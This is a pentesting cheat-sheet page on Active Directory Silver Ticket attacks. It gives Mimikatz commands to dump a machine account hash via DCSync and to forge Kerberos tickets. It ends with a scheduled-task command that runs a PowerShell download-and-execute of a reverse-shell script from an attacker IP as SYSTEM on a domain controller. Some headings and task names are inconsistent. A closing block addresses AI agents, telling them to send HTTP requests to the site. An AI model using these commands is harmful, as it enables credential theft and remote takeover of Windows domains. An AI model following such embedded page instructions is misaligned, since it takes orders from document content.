# Silver Ticket

Silver ticket is signed and encrypted with the target service account hash.\
Represents a valid TGS (for authorization)\
Requirements :\
• Domain SID\
• <mark style="color:orange;">**Service account /Machine Account hash**</mark>\
• Domain name\
• SIDS (in Cross-Forest Attacks)

<figure><img src="/files/OZ2rdQMssoKjYKHxntx7" alt=""><figcaption></figcaption></figure>

Extract krbtgt account hash :thumbsup:

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\dc-01$"'
```

• Domain SID :thumbsup:

```
whoami /all (of a domain user)
```

Adversary Forge Golden ticket in a Domain as follows :thumbsup:

```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1- 5-
21-yyyyyyyy-zzzzzzzzzz-xxxxxx /target:enterprise-dc.cyberwarfare.corp /service:cifs /rc4:<HASH> /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

### Command Execution using Silver Ticket&#x20;

Adversaries create a silver ticket for HOST service which allows them to schedule a malicious\
task on the target

```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:cyberwarfare.corp /sid:S-1-
5-21-xxxxxx-yyyy-zzzzz /target:exterprise-dc.cyberwarfare.corp /service:HOST /rc4:xxxxx /id:500
/groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

Schedule and execute a task on Remote Server

```
schtasks /create /S enterprise-dc.cyberwarfare.corp /SC Weekly /RU "NT Authority\SYSTEM" /TN “lateral" /TR
"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.1:8000/InvokePowerShellTcp.ps1''')'"
```

```
schtasks /Run /S enterprise-dc.cyberwarfare.corp /TN "STCheck"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.cavementech.com/pentesting-quick-reference/active-directory/post-owning-domain/silver-ticket.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
